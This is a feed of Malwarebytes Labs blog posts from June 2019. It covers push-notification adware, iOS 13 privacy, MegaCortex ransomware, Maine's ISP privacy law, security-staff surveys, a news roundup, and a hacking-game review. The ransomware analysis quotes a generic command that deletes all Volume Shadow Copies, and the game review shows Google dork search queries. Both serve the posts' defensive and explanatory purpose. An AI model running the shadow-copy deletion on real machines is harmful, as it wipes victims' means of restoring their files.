For example, Bristol in the UK springs to mind as a great example of how to retool a city in a way that makes sense. There’s still a long way to go before we have other smart cities to rival Bristol though, and that probably applies to the somewhat embattled Toronto waterfront project.

As these projects drag on, issues of data, privacy, and consent appear to be the places where the primary battle lines are drawn. Without some solid answers in place, generals may find themselves run out of town by a cheerfully tech-unenhanced community.

The post Smart cities, difficult choices: privacy and security on the grid appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware and PUPs families add push notifications as an attack vector

Malwarebytes - Thu, 06/13/2019 - 18:36

Some existing families of potentially unwanted programs and adware have added browser push notifications to their arsenal. Offering themselves up as browser extensions for Chrome and Firefox, these threats pose as useful plugins, then hassle users with notifications.

A family of search hijackers

The first I would like to discuss is a large family of Chrome extensions that were already active as search hijackers, but have now added a notifications service from a provider hailing from a domain blocked for fraud by Malwarebytes. What that means is you can now expect browser notifications inviting you to come gamble at an online casino or advertisements selling you get-rich schemes that use pictures of celebrities to gain your trust.

This family is detected under the PUP.Optional umbrella, meaning that Malwarebytes flags them for misconduct but recognizes they offer some kind of functionality and are upfront about the fact that they will change your search settings. The third part of Malwarebytes’ detection name usually refers to the name of the extension. So this one is called PUP.Optional.StreamAll.

The extensions in this family are search hijackers—they redirect users to Yahoo! search results when searching from the address bar. The websites behind all the extensions in this family are presented in three different styles that are completely interchangeable:

Version 1 is a basic design kindly guiding you through the steps of installing the Chrome extension.

Version 2 shows a circle that fills with color until it reaches 100 percent and then tells you it is ready to install the extension.

Version 3 is a bit more “in your face” and lets you know you really shouldn’t miss out on this extension. It does come in a few slightly different color schemes.

The three websites posted above all lead to StreamAll, the same Chrome extension that I have used as an example for this family. In fact, they all redirect to this extension in Chrome’s web store at some point:

A stunning lot of users, which never ceases to amaze me.

Another thing the members of this family have in common is a “thank you” screen after installing one of their extensions, already busy pushing promotional deals. This one has a blue background but can also be fully white.

Their offer to receive notifications is made as soon as you reach one of their sites:

These prompts have also been added to member sites of this family that didn’t promote push notifications earlier on.

If you accept this offer, you can find the resulting permission in Chrome under Settings > Advanced > Privacy and security > Site settings > Notifications.

The number of extensions in this family is rather large, but here is a list of removal guides I created for the most active ones at the moment of writing:

By active I mean they are being heavily promoted by some of the popular ad-rotators. To achieve this, they are probably paying a pretty penny and you can be sure they want to make good on that—at your expense.

A Facebook spammer

The second threat family I want to discuss is into far more serious business. This family of Firefox extensions is detected by Malwarebytes as Trojan.FBSpammer.

These extensions can be found at sites that try to convince users they need a Flash player update.

Prompts and links everywhere. What to do first?

They also ask for permission to send you notifications and—just like StreamAll—they use a provider that is blocked by Malwarebytes for fraud. But in this case, annoying push notifications are the least of users’ worries. As our friends at BleepingComputer figured out, this extension checks users’ Facebook connection and, if the user is logged in, the extension will join some Facebook groups on their behalf and start spamming them.

Every two seconds, the extension checks whether the user is logged in to Facebook. If they are, it adds the user to some Facebook groups, then fetches a campaign and starts spamming those groups in the user’s name.

Lesson learned

While browser push notifications can be annoying, they are easy to resolve, as I explained in detail in my blog Browser push notifications: a feature asking to be abused. But we have seen from the examples above that there are worse things.

Choose carefully which extensions you decide to install, as well as which programs you allow to send push notifications. The extensions in these cases are up to no good—especially the Trojan that will give your Facebook reputation a quick shove into the cellar. And if you have trouble determining which extensions are benign and which are taking advantage of users, you can always count on Malwarebytes to point you in the right direction.

Stay safe, everyone!

The post Adware and PUPs families add push notifications as an attack vector appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Apple iOS 13 will better protect user privacy, but more could be done

Malwarebytes - Wed, 06/12/2019 - 16:42

Last week, Apple introduced several new privacy features to its latest mobile operating system, iOS 13. The Internet, predictably, expressed doubt, questioning Apple’s oversized influence, its exclusive pricing model that puts privacy out of reach for anyone who can’t drop hundreds of dollars on a mobile phone, and its continued, near-dictatorial control of the App Store, which can, at a moment’s notice, change the rules to exclude countless apps.

At Malwarebytes, we sought to answer something different: Do the new iOS features actually provide meaningful privacy protections?

The short answer from multiple digital rights and privacy advocates is: “Yes, but…”

For example: Yes, but Apple’s older phones should not be excluded from the updates. Also: Yes, but Apple’s competitors are not likely to follow. And more broadly: Yes, but Apple is giving users a convenient solution that does not address a core problem with online identity.

Finally: Yes, but Apple can go further.

Apple’s new single sign-on feature

At Apple’s WWDC19 conference in San Jose last week, Senior Vice President of Software Engineering Craig Federighi told audience members that the latest iOS would give Apple users two big privacy improvements: better protection when signing into third-party services and apps, and more options to restrict location tracking.

Apple’s Single Sign-On (SSO) option will allow users to sign into third-party platforms and apps by using their already-created Apple credentials. Called “Sign in with Apple,” Federighi described the feature not so much as a repeat of similar features provided by competitors Google and Facebook, but as a response.

Standing before a projected display of two separate blue rectangles, one reading “Sign in with Facebook,” the other “Sign in with Google,” Federighi told the audience, “We’ve all seen buttons like this.”

While convenient, Federighi said, these features can also compromise privacy, as “your personal information sometimes gets shared behind the scenes, and these logins can be used to track you.” Behind Federighi, the presentation revealed all the types of information that get shuffled around without a user’s full understanding: Full names, gender, email addresses, events attended, locations visited, hometown, social posts, and shared photos and videos.

Federighi said “Sign in with Apple” locks that data dispersal down.

“Sign in with Apple” lets Apple users log into third-party apps and services by using the Face ID or Touch ID credentials created on their device. The SSO feature also gives Apple users the option to provide third parties with “relay” email addresses—randomly-generated email addresses created by Apple that serve as forwarding addresses, giving users the option to keep private their personal email address while still receiving promotional deals from a company or service. Further, relay addresses will not be repeated, and Apple will generate a new relay for each new platform or app.

Apple iOS 13 gives users the option to both share and hide their email from third-party apps when utilizing the company’s single sign-on feature. Courtesy: Apple

Privacy advocates welcomed the feature but warned about over-reliance on Apple as the one true purveyor of privacy.

“Apple’s new sign-in service is definitely a step in the right direction, but it’s important to understand who it’s protecting you from,” said Gennie Gebhart, associate director of research at Electronic Frontier Foundation. “In short, this kind of feature protects you from all sorts of scary third parties but does not necessarily protect you from the company offering it—in this case, Apple.”

Apple has scored positively with EFF’s annual “Who Has Your Back” report, which, for years, evaluated major tech companies for their willingness to fight overbroad, invasive government requests for user data.

But protecting user data from government requests and protecting it from corporate surveillance are different things.

Luckily, Gebhart said, Apple has promised not to use the information it gleans from its SSO feature to track user activity or build profiles from online behavior. But, Gebhart said, the same can’t be assumed from other big tech companies including Google and Facebook.

“[I]t’s important to remember for other SSO services like Facebook’s and Google’s that, even if they implement cool privacy-protective features like Apple has, that won’t necessarily protect you from Facebook or Google tracking your activity,” Gebhart said.

As to whether those companies will actually follow in Apple’s footsteps, Nathalie Maréchal, a senior research analyst at Ranking Digital Rights, seems doubtful, as those competitors rely on entirely different business models.

“Google, Apple’s main competitor in the smartphone market, relies on pervasive data collection at a massive scale not only to sell advertising, but also to train the algorithms that power its products, such as Google Maps,” Maréchal said. “That’s why Google collects as much data as it possibly can: that data is the raw material for its products and services. I don’t see Google shifting to a model where it collects as little information as possible—as Apple says it does—anytime soon.”

That said, Maréchal still commended Apple for offering relay email addresses in its SSO feature.

“This makes the process much more user-friendly, and makes it even harder for data brokers and advertising networks to connect all of someone’s online activity and create a detailed file about them,” Maréchal said.

Yet another researcher, who said it was good to see Apple taking “practical steps” to protect online identities, warned about a larger problem: The increased dependence on a user’s identity as the de facto credential for accessing all sorts of online services and platforms.

“We are seeing more and more websites and apps pushing us to identify ourselves; while sometimes this may be appropriate, it comes along with dangers,” said Tom Fisher, a researcher at Privacy International. “It can be a tool for tracking people across sessions, for instance.”

Fisher continued: “There’s a need for more thought not only on how identification systems can protect people’s privacy, but also when it is appropriate to ask people to identify themselves at all.”

Apple’s new option for location privacy

Apple’s second big feature will give its users the option to more closely manage how their location is tracked by various third-party apps.

With the update to iOS 13, users can choose to share their location “just once” with an app. That means that, if users choose, any service that requests location information—whether it be Yelp when recommending nearby restaurants, Uber when finding nearby drivers, or Fandango when locating nearby movie theaters—will be allowed to access that information just once, and every subsequent request for location information must be approved by the user on an individual basis.

Maréchal called this an important development. She said many apps that request location information provide convenient services for users, and users should have the option to choose between that convenience and that potential loss of privacy. That decision, she said, is unique to each user.

“That’s a very contextual decision and I’m glad to hear that Apple is giving its users more nuanced options than simply ‘on,’ ‘off,’ or ‘only when the app is in use,’” Maréchal said. “For example, I might not want to share my location with Yelp while checking opening hours for a business in my home city, because the privacy trade-off isn’t worth it, and then might share my location while traveling the following week because I don’t know the city I’m visiting well enough to know how far a restaurant is from me.”

Further steps?

When interviewed for this piece, every researcher agreed: Apple’s newest features provide simple, easy-to-use options that can leave users more informed and more in control of their online privacy.

However, another response came up more than once: Apple can—and should—go further.

These responses are not unusual, and, in fact, they follow in the footsteps of all advocacy work, particularly in online privacy. Earlier this year, it was Mozilla, the privacy-forward, nonprofit developer of the web browser Firefox, that asked Apple to do better by its users in protecting them from invasive online tracking. Similarly, it is privacy advocates and researchers who have the most thought-out ideas on protecting user privacy. These researchers had a few ideas for Apple.

First, Maréchal said, Apple should provide “transparency” reports—the way it already does for the government requests it receives for user data—that disclose how third-party apps collect Apple users’ information. She said Apple’s marketing tagline (“What happens on your iPhone, stays on your iPhone”) is only true for the data Apple itself collects, “but it’s not true of data collected by third party apps.”

A Washington Post article last month revealed this to an alarming degree:

“On a recent Monday night, a dozen marketing companies, research firms and other personal data guzzlers got reports from my iPhone. At 11:43 p.m., a company called Amplitude learned my phone number, email and exact location. At 3:58 a.m., another called Appboy got a digital fingerprint of my phone. At 6:25 a.m., a tracker called Demdex received a way to identify my phone and sent back a list of other trackers to pair up with.”

Fisher raised a separate issue regarding Apple’s security updates: Who gets left behind? At such a high price point for the devices (The oldest iPhone model for sale on Apple’s website that is iOS 13 compatible, the Apple iPhone 7, starts at $449), Fisher said, “What happens to people who can’t afford Apple’s expensive products: Are they then left only with access to more invasive ways of identifying themselves?”

Another one of Maréchal’s suggestions could address that problem.

“I would also like some clarity about how long a new iPhone will be guaranteed to receive software updates, as well as a commitment to providing security updates specifically for at least five years,” Maréchal said. “Given how expensive new iPhones can be, customers should know how long the device will be safe to use before they purchase it.”

While this idea does not fix Fisher’s concerns, it at least gives users a better understanding about what they can expect for their own privacy years later. Any company’s decision to put users in more control of their privacy rights is a decision we can sign onto.

The post Apple iOS 13 will better protect user privacy, but more could be done appeared first on Malwarebytes Labs.

Categories: Techie Feeds

MegaCortex continues trend of targeted ransomware attacks

Malwarebytes - Wed, 06/12/2019 - 16:03

MegaCortex is a relatively new ransomware family that continues the 2019 trend of threat actors developing ransomware specifically for targeted attacks on enterprises. While GandCrab apparently shut its doors, several other bespoke, artisanal ransomware families have taken its place, including RobinHood (which shut down the city of Baltimore), Troldesh, and CrySIS/Dharma.

Detected by Malwarebytes as Ransom.MegaCortex, MegaCortex saw a spike in business detections in late May and has since slowed down to a trickle, following a trend similar to that of its Troldesh and CrySIS forebears.

Our anti-ransomware technology detected Ransom.MegaCortex even before definitions were added.

Distribution

The methods of distribution for MegaCortex are still not completely clear, but there are indications that the ransomware is dropped on compromised computers by using Trojan downloaders. Once a corporate network has been compromised, the attackers try to gain access to a domain controller and spread across the entire network from there.

Suspected Trojans that might be responsible for the distribution of MegaCortex are Qakbot aka Qbot, Emotet, and Rietspoof. Rietspoof is a multi-stage malware that spreads through instant messaging programs.

Execution

Before the actual ransomware process starts, several tools and scripts are deployed to disable certain security processes and attempt to gain access to the domain controller so the ransomware can be distributed across the network.

Once the ransomware process is activated, it creates these files:

  • ********.log
  • ********.tsv
  • ********.dll

The ******** are eight random characters that are identical for the three files on the affected system. These names are also mentioned in the ransom note called !!!_READ_ME_!!!.txt.

The ransom note, the log file, and the tsv file are all located in the root of the drive. The dll, on the other hand, can be found in the %temp% folder.

The encrypted files are given the extension .aes128ctr. The encryption routine skips files with the extensions:

  • .aes128ctr
  • .bat
  • .cmd
  • .config
  • .dll
  • .exe
  • .lnk
  • .manifext
  • .mui
  • .olb
  • .ps1
  • .sys
  • .tlb
  • .tmp

The routine also skips the files:

  • desktop.ini
  • ********.tsv
  • ********.log

It also skips all the files and subfolders under %windir%, with the exception of %windir%\temp. In addition, MegaCortex deletes all the shadow copies on the affected system.
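
The analysis doesn’t specify how the shadow copies are removed, but ransomware families commonly do it with the built-in vssadmin utility, along the lines of the following generic sketch (not a confirmed MegaCortex command):

rem Delete all Volume Shadow Copies so files cannot be restored from them
vssadmin delete shadows /all /quiet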

After the encryption routine is complete, MegaCortex displays this rather theatrical ransom note, high on drama and low on grammatical correctness.

Remarkable ransom note quotes

Some notable quotes from the ransom note:

  • “All of your computers have been corrupted with MegaCortex malware that has encrypted your files.” So the name MegaCortex comes from the threat actors themselves, as opposed to the security researchers who discovered it. (That is one way to help the industry to use a unified detection name.)
  • “It is critical that you don’t restart or shutdown your computer.” This implies that one of the seeds for the encryption routine will be made irretrievable if the computer gets rebooted.
  • “The software price will include a guarantee that your company will never be inconvenienced by us.” Is this a tell-tale sign about how much granular control the threat actors have over the malware attacks, or just another empty promise made by criminals?
  • “We can only show you the door. You’re the one who has to walk through it.” A reference to The Matrix or a failed fiction writer?

The ransom note also makes clear that the information necessary for the decryption routine is contained in the randomly named tsv file. So, if all the information except the private key is on the infected computer, does that mean there will be a free decryptor soon? That depends on many other factors, but if the cybercriminals used the same private key for each infection, there could be a possible escape on the horizon.

Undoubtedly it will take some reverse engineering to get definitive answers to these questions, but it certainly gives us some clues.

Countermeasures

Given that the exact infection vector is as of yet unknown, it is hard to give specific protection advice for this ransomware family. But there are some countermeasures that always apply to ransomware attacks, and they might be useful to repeat here:

  • Scan emails with attachments. Suspicious mails with attachments should not reach the end user without being checked first.
  • User education. Users should be taught to refrain from downloading attachments sent to them via email or instant messaging without close scrutiny.
  • Blacklisting. Most endpoints do not need to be able to run scripts. In those cases, you can blacklist wscript.exe and possibly other scripting options, such as PowerShell (see the sketch after this list).
  • Update software and systems. Updating your systems and your software can plug up vulnerabilities and keep known exploits at bay.
  • Back up files. Reliable and easy-to-deploy backups can shorten the recovery time.
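
On the blacklisting point, one simple option (my own example, not something the article prescribes) is to disable Windows Script Host entirely via the registry, which prevents wscript.exe and cscript.exe from running scripts at all:

rem Disable Windows Script Host machine-wide (set the value back to 1 to re-enable)
reg add "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled /t REG_DWORD /d 0 /f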

We are far from knowing everything there is to know about this ransomware, but as we discover new information, we will keep our blog readers updated. In the meantime, it is imperative for enterprises to employ best practices for protecting against all ransomware.

After all, we can only show you the door. You’re the one who has to walk through it.

Stay safe, everyone!

The post MegaCortex continues trend of targeted ransomware attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Maine governor signs ISP privacy bill

Malwarebytes - Tue, 06/11/2019 - 16:57

Less than one week after Maine Governor Janet Mills received one of the nation’s most privacy-protective state bills on her desk, she signed it into law. The move makes Maine the latest US state to implement its own online privacy protections.

The law, which will go into effect July 1, 2020, blocks Internet service providers (ISPs) from selling, sharing, or granting third parties access to their customers’ data unless explicitly given approval by those customers. With the changes, Maine residents now have an extra layer of protection for the emails, online chats, browser history, IP addresses, and geolocation data that is commonly collected and stored by companies like Verizon, Comcast, and Spectrum.

In signing the bill, Governor Mills said the people of Maine “value their privacy, online and off.”

“The Internet is a powerful tool, and as it becomes increasingly intertwined with our lives, it is appropriate to take steps to protect the personal information and privacy of Maine people,” said Governor Mills in a released statement. “With this common-sense law, Maine people can access the Internet with the knowledge and comfort that their personal information cannot be bought or sold by their ISPs without their express approval.”

The bill, titled “An Act to Protect the Privacy of Online Customer Information,” was introduced earlier this year by its sponsor, Democratic state Senator Shenna Bellows. It passed through the Maine Legislature’s Committee on Energy, Utilities, and Technology, and gained approval both in the House of Representatives and the Senate soon after. Given until June 11 to sign the bill into law, Governor Mills moved quickly, giving her signature on June 6.

As Maine’s lawmakers worked to review and slightly amend the bill (adding a start date to go into effect), it picked up notable supporters, including ACLU of Maine and GSI Inc., a local, small ISP in the state. In an opinion piece published in Bangor Daily News, GSI’s chief executive and chief operating officer voiced strong support for online privacy, saying that “if people can’t trust the Internet, then the value of the Internet is significantly lessened.”

The Maine State Chamber of Commerce opposed the bill, arguing that a new state standard could confuse Maine residents. The Chamber also said the bill was too weak because it did not extend its regulations to some of the Internet’s most noteworthy privacy threats—Silicon Valley companies, including Facebook and Google.

The ACLU of Maine and the Maine State Chamber of Commerce did not return requests for comment about the Governor’s signing.

Sen. Bellows, in the same statement referenced above, commended Maine’s forward action.

“Mainers need to be able to trust that the private data they send online won’t be sold or shared without their knowledge,” Sen. Bellows said. “This law makes Maine first and best in the nation in protecting consumer privacy online.”

The post Maine governor signs ISP privacy bill appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cybersecurity pros think the enemy is winning

Malwarebytes - Tue, 06/11/2019 - 15:00

There is a saying in security that the bad guys are always one step ahead of defense. Two new sets of research reveal that the constant cat-and-mouse game is wearing on security professionals, and many feel they are losing the war against cybercriminals.

The first figures are from the Information Systems Security Association (ISSA) and industry analyst firm Enterprise Strategy Group (ESG). The two polled cybersecurity professionals and found 94 percent of respondents believe that cyber adversaries have a big advantage over cyber defenders—and the balance of power is with the enemy. Most think that advantage will eventually pay off for criminals, as 91 percent believe that most organizations are extremely vulnerable, or somewhat vulnerable, to a significant cyberattack or data breach.

This mirrors Malwarebytes’ own recent research, in which 75 percent of surveyed security professionals admitted that they believe they could be breached in the next one to three years.

What’s behind this defeatist mindset?

In a blog post on the ESG/ISSA research, Jon Oltsik, principal analyst at ESG, says the lack of confidence exists in part because criminals are well organized, persistent, and have the time to fail and try a new strategy in order to infiltrate a network. Meanwhile, security managers are always busy and always playing catch-up.

The skills shortage that is impacting the security field is compounding the sense of vulnerability among organizations. ESG found 53 percent of organizations report a problematic shortage of cybersecurity skills, and 63 percent of organizations continue to fall behind in providing an adequate level of training for their cybersecurity professionals.

“Organizations are looking at the cybersecurity skills crisis in the wrong way: It is a business, not a technical, issue,” said ISSA International President Candy Alexander in response to findings. “In an environment of a ‘seller’s market’ with 77 percent of cybersecurity professionals solicited at least once per month, the research shows in order to retain and grow cybersecurity professionals at all levels, business leaders need to get involved by building a culture of support for security and value the function.”

Where do we go from here?

An entirely new perspective on addressing risk mitigation is required to turn this mindset around. As Alexander notes, security is a business issue, and it needs attention at all levels of the organization.

But the research shows it doesn’t get the respect it deserves, as 23 percent of respondents said business managers don’t understand and/or support an appropriate level of cybersecurity. Business leaders need to send a clear message that cybersecurity is a top priority and invest in security tools and initiatives in turn to reflect this commitment.

This approach is well-supported by research. In fact, a recent report from  Deloitte and the Financial Services Information Sharing and Analysis Center (FS-ISAC) finds top-performing security programs have one thing in common: They have the attention of executive and board leadership, which also means security is seen as a priority throughout the organization.

ESG/ISSA makes other recommendations for changing the thinking about security. They include:

CISO elevation: CISOs and other security executives also need an increased level of respect and should be expected to engage with executive management. Regular audience with the board is critical to getting security the visibility it requires organization-wide.

Practical professional development for security pros: While 93 percent of survey respondents agree that cybersecurity professionals must keep up with their skills, 66 percent claim that cybersecurity job demands often prevent them from taking part in skills development. Others noted that certifications do not hold as much value on the job, with 57 percent saying many credentials are far more useful in getting a job than doing a job. The report suggests prioritizing practical skills development over certifications.

Develop security talent from within: Because the skills gap makes hiring more challenging, 41 percent of survey respondents said that their organization has had to recruit and train junior personnel rather than hire more experienced infosec professionals. Born of necessity or not, this is a creative way to deal with a dearth of qualified talent.

The report recommends designing an internal training program that will foster future talent and loyalty. It also suggests casting a wider net beyond IT and finding transferable business skills and cross career transitions will help expand the pool of talent.

While the overall picture appears as though security progress is slow in business, adjustments in approach and prioritization of security can go a long way in raising the program’s profile throughout the organization. With more time, attention, and respect given to security strategy and risk mitigation, defense in the future can be a step ahead instead of woefully behind the cybercriminal.

The post Cybersecurity pros think the enemy is winning appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (June 3 – 9)

Malwarebytes - Mon, 06/10/2019 - 17:30

Last week on Malwarebytes Labs, we rounded up some leaks and breaches, reported on Magecart skimmers found on Amazon CloudFront CDN, proudly announced we were awarded Best Cybersecurity Vendor Blog at the annual EU Security Blogger Awards, discussed how Maine inches closer to shutting down ISP pay-for-privacy schemes, asked where our options to disable hyperlink auditing had gone, and looked at video game portrayals of hacking with NITE Team 4.

Other cybersecurity news
  • At Infosecurity Europe, a security expert from Guardicore discussed a new cryptomining malware campaign called Nanshou, and why the cryptojacking threat is set to get worse. (Source: Threatpost)
  • A security breach at a third-party billing collections firm exposed the personal and financial data on as many as 7.7 million medical testing giant LabCorp customers. (Source: Cnet)
  • A researcher has created a module for the Metasploit penetration testing framework that exploits the critical BlueKeep vulnerability on vulnerable Windows XP, 7, and Server 2008 machines to achieve remote code execution. (Source: BleepingComputer)
  • Microsoft’s security researchers have issued a warning about an ongoing spam wave that is spreading emails carrying malicious RTF documents that infect users with malware without user interaction, once users open the RTF documents. (Source: ZDNet)
  • The Federal Trade Commission has issued two administrative complaints and proposed orders which prohibit businesses from using form contract terms that bar consumers from writing or posting negative reviews online. (Source: FTC.gov)
  • Security researchers have discovered a new botnet that has been attacking over 1.5 million Windows systems running a Remote Desktop Protocol (RDP) connection exposed to the Internet. (Source: ZDNet)
  • Microsoft has deleted a massive database of 10 million images which was being used to train facial recognition systems. The database is believed to have been used to train a system operated by police forces and the military. (Source: BBC news)
  • On Tuesday, the Government Accountability Office (GAO) said that the FBI’s Facial Recognition office can now search databases containing more than 641 million photos, including 21 state databases. (Source: NakedSecurity)
  • Despite sharing a common Chromium codebase, browser makers like Brave, Opera, and Vivaldi don’t have plans on crippling support for ad blocker extensions in their products—as Google is currently planning on doing within Chrome. (Source: ZDNet)
  • Traffic destined for some of Europe’s biggest mobile providers was misdirected in a roundabout path through the Chinese-government-controlled China Telecom on Thursday, in some cases for more than two hours. (Source: ArsTechnica)

Stay safe, everyone!

The post A week in security (June 3 – 9) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Video game portrayals of hacking: NITE Team 4

Malwarebytes - Fri, 06/07/2019 - 16:52

Note: The developers of NITE Team 4 granted the blog author access to the game plus DLC content.

A little while ago, an online acquaintance of mine asked if a new video game based on hacking called NITE Team 4 was in any way realistic, or “doable” in terms of the types of hacking it portrayed (accounting for the necessary divergences from how things would work outside of a scripted, plot-goes-here environment).

The developers, AliceandSmith, generously gave me a key for the game, so I’ve spent the last month or so slowly working my way through the content. I’ve not completed it yet, but what I’ve explored is enough to feel confident in making several observations. This isn’t a review; I’m primarily interested in the question: “How realistic is this?”

What is it?

NITE Team 4 is an attempt at making a grounded game focused on a variety of hacking techniques—some of which researchers of various coloured hats may (or may not!) experience daily. It does this by allowing you full use of the so-called “Stinger OS,” their portrayal of a dedicated hacking system able to run queries and operate advanced hacking tools as you take the role of a computer expert in a government-driven secret organisation.

Is it like other hacking games?

Surprisingly, it isn’t. I’ve played a lot of hacking games through the years. They generally fall into two camps. The first are terrible mini-games jammed into unrelated titles that bear no resemblance to “hacking” whatsoever. You know what I’m talking about: They’re the bits flagged as “worst part of the game” whenever you talk to a friend about any form of digital entertainment.

The second camp is the full-fledged hacking game, the type built entirely around some sort of stab at portraying hacking. The quality is variable, but these titles often have a specific look and act a certain way.

Put simply, the developers usually emigrate to cyberpunk dystopia land and never come back. Every hacker cliché in the book is wheeled out, and as for the actual hacking content, it usually comes down to abstractions of what the developer assumes hacking might be like, rather than something that it actually resembles.

In other words: You’re not really hacking or doing something resembling hacking. It’s really just numbers replacing health bars. Your in-game computer is essentially just another role-playing character, only instead of a magic pool you have a “hacking strength meter” or something similar. Your modem is your stamina bar, your health bar is replaced by something to do with GPU strength, and so on.

They’re fun, but they get a little samey after a while.

Meanwhile, in NITE Team 4: I compromised Wi-Fi enabled billboards to track the path of the potentially kidnapped owner of a mobile phone.

I used government tools to figure out the connection between supposedly random individuals by cross referencing taxi records and payment stubs. I figured out which mobile phone a suspect owns by using nearby Wi-Fi points to build a picture of their daily routine.

I made use of misconfigured server settings to view ID cards belonging to multiple companies looking for an insider threat.

I performed a Man-in-the-Middle attack to sniff network traffic and made use of the Internet of Things to flag a high-level criminal suspect on a heatmap.

If it sounds a little different, that’s because it is. We’re way beyond the old “Press H to Hack” here.

Logging on

Even the title screen forced me to weigh up some serious security choices: Do I allow the terminal to store my account username and password? Will there be in-game repercussions for this down the line? Or do I store my fictitious not-real video game login in a text file on my very-real desktop?

All important decisions. (If you must know, I wrote the password on a post-it note. I figure if someone breaks in, I have more pressing concerns than a video game login. You’re not hacking my Gibson, fictitious nation state attackers).

Getting this show on the road

Your introduction to digital shenanigans isn’t for the faint of heart. As with many games of this nature, there’s a tutorial—and what a tutorial.

Spread across three sections covering basic terminal operations, digital forensics, and network intrusion, there are no fewer than 15 specific tutorials, and each of those contains multiple components.

I can’t think of any other hacking-themed game where, before I could even consider touching the first mission, I had to tackle:

Basic command line tools, basic and advanced OSINT (open source intelligence), mobile forensics, Wi-Fi compromise, social engineering via the art of phishing toolkits, MiTM (Man in the Middle), making use of exploit databases, and even a gamified version of the infamous NSA tool Xkeyscore.

When you take part in a game tutorial that suggests users of Kali and Metasploit may be familiar with some aspects of the interface, or happily links to real-world examples of tools and incidents, you know you’re dealing with something that has a solid grounding in “how this stuff actually works.”

In fact, a large portion of my time was spent happily cycling through the tutorial sections and figuring out how to complete each mini objective. If you’d told me the entire game was those tutorials, I’d probably have been happy with that.

What play styles are available?

The game is fairly aligned to certain types of Red Team actions, primarily reconnaissance and enumeration. You could honestly just read an article such as this and have a good idea of how the game is expected to pan out. Now, a lot of other titles do this to some degree. What’s novel here is the variety of approaches on offer to the budding hacker.

There are several primary mission types: The (so far) four-chapter-long main mission story, which seems to shape at least certain aspects based on choices made earlier on. This is where the most…Hollywood?…aspects of the story surrounding the hacking seem to reside. In fairness, they do assign a “real life” rating to each scenario and most of them tend to err on the side of “probably not happening,” which is fair enough.

The second type of mission is the daily bounties, where various government agencies offer you rewards for hacking various systems or gathering intel on specific targets. I won’t lie: The interface has defeated me here, and I can’t figure out how to start one. It’s probably something incredibly obvious. They’ll probably make me turn in my hacker badge and hacker gun.

Last of all—and most interesting—are the real world scenarios. These roughly resemble the main missions, but with the added spice of having to leave the game to go fact finding. You may have to hunt around in Google, or look for clues scattered across the Internet by the game developers.

Each mission comes with a briefing document explaining what you have to do, and from there on in, it’s time to grab whatever information you can find lying around online (for real) and pop your findings back into the game.

In keeping with the somewhat less Hollywood approach, the tasks and mission backgrounds are surprisingly serious and the monthly releases seem to follow “what if” stories about current events.

They deal with everything from infiltrating Emmanuel Macron’s files (topical!) to tackling methamphetamine shipments in South Korea, and helping to extract missing journalists investigating the internment of religious minorities in China. As I said…surprisingly serious.

Getting your gameface on

Most tasks begin by doing what you’d expect—poking around on the Internet for clues. When hackers want to compromise websites or servers, they often go Google Dorking. This is essentially hunting around in search engines for telltale signs of passwords, exposed databases, and other things a website or server should keep hidden, but that the admin hasn’t been paying enough attention to.
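
To give a flavour (the search operators here are real Google syntax, but the site and terms are placeholders rather than anything from the game), a dork can be as simple as:

site:example.com inurl:admin
site:example.com filetype:sql "password"
intitle:"index of" "backup"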

The idea in NITE Team 4 is to rummage around for subdomains and other points of interest that should’ve been hidden from sight and then exploit them ruthlessly. Different combinations of search and different tools provided by Stinger OS produce different results.

Once you have half a dozen subdomains, then you begin to fingerprint each one and check for vulnerabilities. As is common throughout the game, you don’t get any sort of step-by-step walkthrough on how to break into servers for real. Many key tasks are missed out because it probably wouldn’t make for an interesting game, and frankly there’s already more than enough here to try and figure out while keeping it accessible to newcomers.

Should you find a vulnerable subdomain, it’s then time to run the custom-made vulnerability database provided by Stinger OS, and then fire up the compromise tool (possibly the most “gamey” part of the process) that involves dragging and dropping aspects of the described vulnerability into the hacking tool and breaking into the computer/server/mobile phone.

From there, the mission usually diverges into aspects of security not typically covered in games. If anything, the nuts and bolts terminal stuff is less of a focus than working out how to exploit the fictitious targets away from your Stinger terminal. It feels a lot more realistic to me as a result.

What else can you do?

Before long, you’ll be trying various combinations of data about targets, and their day-to-day life, in the game’s XKeyscore tool to figure out patterns and reveal more information.

You’ll be using one of your VPNs to access a compromised network and use several techniques to crack a password. Maybe you won’t need to do that at all, because the target’s phone you just compromised has the password in plaintext in an SMS they sent their boss. What will you do if the password isn’t a password, but a clue to the password?

Once obtained, it might help reveal the location of a rogue business helping an insider threat hijack legitimate networks. How will you take them down? Will you try and break into their server? Could that be a trap? Perhaps you grabbed an email from the business card you downloaded. Is it worth firing up the phishing toolkit and trying to craft a boobytrapped email?

Would they be more likely to fall for a Word document or a Flash file? Should the body text resemble an accounting missive, or would a legal threat be more effective?

I hear those IoT smart homes are somewhat vulnerable these days. Anyone for BBQ?

…and so on.

I don’t want to give too much away, as it’s really worth discovering these things for yourself.

Hack the planet?

I mentioned earlier that I’d have been happy with just the tutorials to play around in. You’re not going to pop a shell or steal millions from a bank account by playing this game because ultimately it’s just that—a game. You’re dropped into specific scenarios, told to get from X to Y, and then you’re left to your own devices inside the hacker sandbox. If you genuinely want to try and tackle some of the basics of the trade, you should talk to security pros, ask for advice, go to conferences, take up a few courses, or try and grab the regular Humble Hacking Bundles.

Occasionally I got stuck and couldn’t figure out if I was doing something wrong, or the game was. Sometimes it expected you to input something exactly as it was presented, but didn’t mention you’d need to leave off the “/” at the end. Elsewhere, I was supposed to crack a password but despite following the instructions to the letter, it simply wouldn’t work—until it did.

Despite this, I don’t think I’ve played a game based on hacking with so many diverse aspects to it.

Bottom line: Is it realistic?

The various storyline scenarios are by necessity a little “out there.” You’re probably not going to see someone blowing up a house in Germany via remote-controlled Hellfire missile strike anytime soon. But in terms of illustrating how many tools people working in this area use, and how they use lateral thinking and clever connections to solve a puzzle and get something done, it’s fantastic. There are multiple aspects of this—particularly where OSINT, making connections, and figuring out who did what and where are concerned—that I recognise.

While I was tying up this blog post, I discovered the developers are producing special versions of it for training. This doesn’t surprise me; I could imagine this has many applications, including making in-house custom security policy training a lot more fun and interesting for non-infosec employees.

